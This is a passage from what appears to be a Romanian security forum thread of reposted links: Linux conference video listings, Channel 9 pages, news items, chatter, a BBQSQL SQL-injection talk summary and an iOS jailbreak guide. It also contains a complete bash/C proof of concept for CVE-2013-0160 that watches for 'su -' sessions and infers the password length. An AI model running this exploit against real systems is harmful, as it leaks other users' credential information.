right]03-Feb-2013 17:14 [/TD] [TD=align: right]151M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Stereographic_film_making_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 23:09 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Systems_Administration_Server_and_Process_Behavior.mp4[/TD] [TD=align: right]03-Feb-2013 01:08 [/TD] [TD=align: right]282M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_Robotics_and_Embedded_Computing_with_Legos_and_Arduino.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right] 41M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_the_X_server_new_tricks.mp4[/TD] [TD=align: right]04-Feb-2013 09:38 [/TD] [TD=align: right]102M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_IPocalypse_20_months_later.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right]177K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Perl_Renaissance.mp4[/TD] [TD=align: right]02-Feb-2013 20:17 [/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Raspberry_Pi_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 21:45 [/TD] [TD=align: right]159M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_future_of_nonvolatile_memory.mp4[/TD] [TD=align: right]02-Feb-2013 19:24 [/TD] [TD=align: right] 49M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_real_story_behind_Wayland_and_X.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Theres_a_Party_In_Your_Box_And_Everyones_Invited.mp4[/TD] [TD=align: right]02-Feb-2013 21:21 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Think_Create_Critique_Design.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Touch_and_Go_Modern_User_Interfaces_with_Open_Source.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Transcendent_Memory_Not_Just_for_Virtualization_Anymore.mp4[/TD] [TD=align: right]03-Feb-2013 18:40 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Trinity_A_Linux_kernel_fuzz_tester_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 00:37 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Two_years_of_LibreOffice.mp4[/TD] [TD=align: right]03-Feb-2013 00:48 [/TD] [TD=align: right]109M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]UEFI_the_Converged_Firmware_Infrastructure.mp4[/TD] [TD=align: right]02-Feb-2013 21:48 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_Puppet_to_Model_Application_clusters.mp4[/TD] [TD=align: right]04-Feb-2013 10:23 [/TD] [TD=align: right]101M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_open_source_in_over_1100_schools_in_New_Zealand.mp4[/TD] [TD=align: right]02-Feb-2013 21:49 [/TD] [TD=align: right]1.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Vampire_Mice_How_USB_PM_impacts_you.mp4[/TD] [TD=align: right]02-Feb-2013 23:03 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Why_kernel_space_sucks.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Wiggle_while_you_work.mp4[/TD] [TD=align: right]03-Feb-2013 13:48 [/TD] [TD=align: right] 92M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]gitannex.mp4[/TD] [TD=align: right]03-Feb-2013 18:29 [/TD] [TD=align: right] 61M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]redgrep_from_regular_expression_derivatives_to_LLVM.mp4[/TD] [TD=align: right]02-Feb-2013 18:58 [/TD] [TD=align: right] 60M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]users_delighted_better_UX_using_CSS_3_in_particular_and_HTML5_in_general.mp4[/TD] [TD=align: right]03-Feb-2013 14:37 [/TD] [TD=align: right] 94M[/TD] [TD] [/TD] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [/TABLE] Sursa: Index of /linux.conf.au/2013/mp4

Chinese experts slam U.S. hacking accusations - People's Daily Online US military advisor calls for McKinnon pardon, recruitment of "master hackers" • The Register https://www.computerworld.com/s/article/9236535/President_can_order_preemptive_cyberattacks_if_needed 'Chinese still hacking us,' says Wall Street Journal owner | Security & Privacy - CNET News

Da, ai dreptate, munca pe bani putini. Dar sa nu uitam ca open-source nu inseamna lipsa unei finantari. Companiile mari care fac practic bani de pe urma proiectelor open-source platesc oameni sa lucreze la aceste proiecte. Un exemplu ar fi Intel si un exemplu de proiect e chiar kernelul de Linux. Daca procesoarele lor nu ar functiona pe Linux ar fi nasol, deci investesc in programatori de kernel. Cam asa e si cu alte proiecte, se mai adauga donatii in unele cazuri sau sponsorizari, cum e cazul OpenSSL care asteapta sponsorizari de 50K dolari. Dar daca suntem atenti, ne dam seama ca ofera suport FIPS, certificare care costa cam 50K dolari. Ce poate fi util pentru acesti tineri pe langa faptul ca invata multe lucruri noi si utile e faptul ca ajung sa lucreze la companii mari gen Google care ii vor trata bine.

Uuu, shit just got serious... Avem cele doua tabere: 1. Chinezii cu vorba aia: Cum sparg chinezii o parola? Incearca fiecare cate una. Adica sunt multi -> potential 2. Americanii care sunt baieti cu bani si pot plati niste indieni cu 2 dolari pe an sa le faca treburile murdare Pe cine pariati?

De pe Jurnalul, aceeasi stire: "Cei 334 de elevi participanti din 36 de ??ri au trebuit sa rezolve 1925 de diferite teme si sarcini propuse de organizatiile open source" "Cei 20 au rezolvat 576 de teme anun?? Google Open Source" Aparent el a lucrat la BRL-CAD | Open Source Solid Modeling . Sunt curios daca aceste initiative sunt ok, sau companiile doar pun niste copii sa le faca treaba Se pare ca alte proiecte pe acolo au mai fost Fedora, NetBSD, KDE si Haiku. Interesant.

Vine HTML 5 si nu mai e nevoie nici de Java nici de Flash.

Da, frumos articol

[h=1]Stephan T. Lavavej - Core C++, 8 of n[/h] [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 63.4 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 374.7 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 444.2 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 821.3 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 573.1 MB High Quality WMV (PC, Xbox, MCE) In part 8, STL digs into the do-while loop, casts, one definition rule (ODR), and his variadic template array sorter. There is a lot of information in this episode, so get comfortable, tune in, and learn. See part 1: Name Lookup See part 2: Template Argument Deduction See part 3: Overload Resolution See part 4: Virtual Functions See part 5: Explicit and Partial Specialization See part 6: New C++11 features added to the Visual C++ 2012 compiler (CTP) See part 7: Usual Arithmetic Conversions and Template Metaprogramming Sursa: Stephan T. Lavavej - Core C++, 8 of n | C9 Lectures: Stephan T. Lavavej - Core C++ | Channel 9

Rapid Blind Sql Injection Exploitation With Bbqsql Description: Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. This talk will be introducing a new tool called BBQSQL that attempts to address these concerns. This talk will start with a brief discussion of SQL Injection and Blind SQL Injection. It will then segue into a discussion of how BBQSQL can be useful in exploiting these vulnerabilities. This talk will cover how features like evented concurrency and character frequency based searching can greatly improve the performance of a SQL Injection tool. This talk should leave you with enough knowledge to begin using BBQSQL to simplify and speed up your application pentests. Ben Toews is a Security Consultant at Neohapsis where he specializes in application and network pentesting. Previously, Ben has worked as a sysadmin and as a developer. Ben has spoken at Thotcon 0x03 and has been published in HITB Magazine. Ben has a BS in Information Assurance and Security Engineering from DePaul University. Twitter: @mastahyeti Ben Toews (mastahyeti) Scott Behrens is currently employed as a Security Consultant at Neohapsis and an Adjunct Professor at DePaul University. Before Neohapsis, Scott Behrens was an Open Systems Architect for a financial consulting firm, as well as a Network Administrator at Argonne National Laboratories. Scott Behrens' expertise lies in software security assessment, network penetration testing, social engineering, security architecture, and security research. Scott is also the co-developer of NeoPI, a framework to aid in the detection of obfuscated malware. Scott has also presented at Chicago B-sides and has published numerous articles in various security outlets. Scott Behrens has an MS in Network Security from DePaul University. Twitter: @HelloArbit Scott Behrens (Arbit) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Rapid Blind Sql Injection Exploitation With Bbqsql

[h=1]Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure[/h] #!/bin/bash # ptmx-su-pwdlen.sh -- This PoC determine the password length of a local # user who runs "su -". Done thanks to the ptmx keystroke timing attack # (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for # more information. # # Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64). # # "THE BEER-WARE LICENSE" (Revision 42): # <vladz@devzero.fr> wrote this file. As long as you retain this notice # you can do whatever you want with this stuff. If we meet some day, and # you think this stuff is worth it, you can buy me a beer in return. -V. if ps -e -o cmd= | egrep -q "^(-|^)su"; then echo "[-] Kill/close all running \"su\" session before using this PoC" exit 1 fi exe=$(mktemp) || exit 1 tmp=$(mktemp) || exit 1 cat > ${exe}.c << _EOF_ #include <stdio.h> #include <signal.h> #include <unistd.h> #include <sys/inotify.h> static int count = 0; void display_result() { printf("[+] password len is %d\n", count-1); _exit(0); } int main() { int fd; char buf[1024]; signal(SIGINT, display_result); fd = inotify_init(); inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY); while(read(fd, buf, 1024)) count++; return 0; } _EOF_ cc -o ${exe}{,.c} echo " [*] Wait for someone to run \"su -\"" while true; do ps -e -o cmd= | egrep "^(-|^)su" >${tmp} x=$(wc -l ${tmp}) case ${x% *} in 1) (( run )) && continue; echo -n "[+] su detected, full command: " cat ${tmp}; ${exe} & (( run = 1 )) ;; 2) [ ! -z "$!" ] && kill -2 $!; break ;; esac done rm -f ${exe}{,.c} ${tmp} Sursa: Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure

Captureaza un request si arata-mi exact cum il trimite browser-ul tau. Asta ca sa nu stau eu cu tcpdump ca mor.

http://i49.tinypic.com/2rz75n6.png

Cred ca glumesti... Acolo nu sunt puse cu [ IMG ] , sunt doar niste link-uri. Imgur: Imageshack: Nu iti apar?

No pula, acum sunt multe de China, Indonezia, Brazilia si alte tari de care nu am auzit Cati vizitatori avem: There are currently 1517 users online. 81 members and 1436 guests Asta e tot ce pot fetele? netstat -ntp | sort -u | grep FIN_WAIT1 | grep -E -o '443.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})' | grep -E -o '([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})' | sort -u

Detalii: https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf

E posibil ca unele servere sa verifice HTTP_REFERER si daca vad ca se face request de pe alt server sa dea cod de eroare. Pune niste exemple.

Defrag Tools: #26 - WinDbg - Semaphores, Mutexes and Timers By: Larry Larsen, Andrew Richards, Chad Beeder How do I download the videos? To download, right click the file type you would like and pick “Save target as…” or “Save link as…” Why should I download videos from Channel9? It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! Which version should I choose? If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) File size 46.7 MB MP4 (iPod, Zune HD) File size 281.5 MB Mid Quality WMV (Lo-band, Mobile) File size 167.7 MB High Quality MP4 (iPad, PC) File size 619.7 MB Mid Quality MP4 (WP7, HTML5) File size 432.3 MB High Quality WMV (PC, Xbox, MCE) In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to diagnose Semaphores, Mutexes and (Waitable) Timers in a user mode application. For timers, we delve deep in to the kernel to gather more information about them. We use these commands: !handle !handle <handle> <mask> !object <name> !object <addr> !timer !timer <addr> ub @rip dt nt!_KTHREAD <addr> Make sure you watch Defrag Tools Episode #1 and Defrag Tools Episode #23 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbol and source code resolution. Resources: Synchronization Functions Semaphore Objects Mutex Objects Waitable Timer Objects Sysinternals LiveKD Sysinternals WinObj Windows 7 and Windows Server 2008 R2 Kernel Changes (Timer Coalescing) Timeline: [02:47] - Demo Apps [SkyDrive] [03:08] - Semaphores [09:32] - Mutexes [15:32] - Waitable Timers [15:58] - Clock Resolution [17:05] - Timer Coalescing [19:45] - Timer demo application [25:05] - LiveKD makes a kernel dump [26:37] - Object Manager - !object [29:40] - DPC Timers - !timer [35:22] - !timer <addr> [35:52] - Waiting Threads - !thread <addr> 17 [37:08] - Wait Start TickCount [38:55] - Kernel Wait Routines [41:12] - Dump Type of Kernel Thread - dt nt!_KTHREAD <addr> [42:00] - Running, Ready and Waiting states [44:54] - Wakable Timers [47:22] - powercfg.exe /waketimers [49:18] - 'Century' DPC Timer Routine [50:43] - Post in the forums and email us at defragtools@microsoft.com! Sursa: Defrag Tools: #26 - WinDbg - Semaphores, Mutexes and Timers | Defrag Tools | Channel 9

[h=1]How to: iOS 6.x Untethered Jailbreak on Linux[/h] The following tutorial will teach Linux users how to jailbreak their Apple iPhone 3GS, iPhone 4/4S, iPad 2/3/4 and iPod Touch 4G/5G devices that run iOS 6 or later. In this tutorial we will use the recently released evasi0n jailbreak tool, which runs on Linux, Mac OS X and Windows platforms. In no more than five minutes, your iDevice will be jailbreaked, only if you read the following information and warnings carefully. Supported devices: · iPhone 3GS; · iPhone 4 GSM; · iPhone 4S; · iPod Touch 4G; · iPod Touch 5G; · iPad 2 Wi-Fi; · iPad 2 3G; · iPad 2 2012; · iPad 3 Wi-Fi · iPad 3 Wi-Fi + 4G; · iPad 4 Wi-Fi; · iPad 4 Wi-Fi + 4G; · iPad Mini Wi-Fi; · iPad Mini 3G. Requirements: · evasi0n 1.0; · A device from the above list with iOS 6.0, 6.0.1 or 6.1; · A Linux distribution with a recent version of libimobiledevice library, kernel >= 2.6.24, and libgtk+-2.0 >= 2.24.13. WARNING:Make sure that your iPad, iPhone or iPod device is supported (see the supported devices list at the beginning of the article) and that is was already updated to iOS 6.x. Those of you who require a network unlock DO NOT PROCEED with the tutorial! ATTENTION: ALWAYS make a backup of your device(s) before the jailbreak procedure! Make sure the battery is charged over 50% and that the device is connected to the computer via the USB cable! Not meeting these requirements will result in a failure! Step 1 – Download and execute evasi0n You can grab a copy of the evasi0n jailbreak tool right now from here. Download it on your desktop and extract the file from the archive. Both 32-bit and 64-bit architectures are supported. Connect your iDevice and double-click the executable for your architecture and you will see the following window... [TABLE=align: center] [TR] [TD][/TD] [/TR] [/TABLE] Your device will be detected, and all you have to do now is to click the "Jailbreak" button. DO NOT PUSH ANY BUTTONS! DO NOT TOUCH THE COMPUTER! DO NOT REMOVE ANY CABLE! When the progress bar on the evasi0n tool is complete, and the evasi0n icon appears on your device, launch it to complete the jailbreak process! When evasi0n finished the jailbreak process, reboot the device and you'll see the Cydia icon on the home screen of your iDevice, which means that the jailbreak process is over and you can restore the backup. Watch the video below for more details! Sursa: How to: iOS 6.x Untethered Jailbreak on Linux - Softpedia

[h=1]JavaScript becoming default language for GNOME apps[/h] At the GNOME Developer Experience Hackfest in Brussels, the GNOME developer community has tackled the problem of specifying a canonical development language for writing applications for the GNOME desktop. According to a blog post by Collabora engineer and GNOME developer Travis Reitter, members of the GNOME team are often asked what tools should be used when writing an application for the desktop environment and, up until now, there has been no definitive answer. The team has now apparently decided to standardise on JavaScript for user-facing applications while still recommending C as the language to write system libraries in. The Hackfest took place in the days immediately preceding the FOSDEM 2013 conference in Brussels and was well attended by representatives from many different open source companies. There was a "broad consensus" to adopt a single language for GNOME application development, says Reitter. He points out that a canonical language enables the developers to more easily prepare documentation for, and share knowledge with, newcomers to the development community. It also helps more easily integrate applications written for the desktop with the desktop's infrastructure. After a long discussion weighing the arguments for and against several languages, the developers apparently decided on JavaScript, as it is already well supported in GNOME 3 by virtue of the fact that the desktop's GNOME Shell interface uses it to implement its user interface. Reitter also points to ongoing work to make JavaScript better supported as a first class desktop development language. GNOME's JavaScript plans are informed in part by how the language is used for similar purposes in Windows 8, Firefox OS and other systems, and that, the team hopes, will make it easier for developers who are new to GNOME to work with it. Despite the fact that JavaScript will be the recommended way to write GNOME applications, the developers are nonetheless stressing that other languages will still be supported. "It's critical that everyone understands this decision as a plan to elevate the language, bindings, tools, and documentation to a level of quality we have not yet achieved. It is not a decision to abandon any other language bindings", says Reitter. (fab) Sursa: JavaScript becoming default language for GNOME apps - The H Open: News and Features

ApiHooks 6 ApiHooks 6 is a set of libraries and tools for advanced process modification and noninvasive debugging on Microsoft® Windows® NT 3.51, 4.0, 2000, XP, 2003, Vista, 2008, 7 x86 and x64. AH6 is not compatible with AH5. It can hook even autochk at boot time or a process before its full initialization (= before DllMains of statically linked modules are first time executed). Works under any account and doesn't modify files. There's still no need for services or kernel drivers. ApiHooks 6 is free. Current version : 6.8 Previous version : 6.6 Previous version : 6.51 Previous version : 6.5 Previous version : 6.4 Previous version : 6.3 Sursa: ApiHooks 6 - ApiHooks.com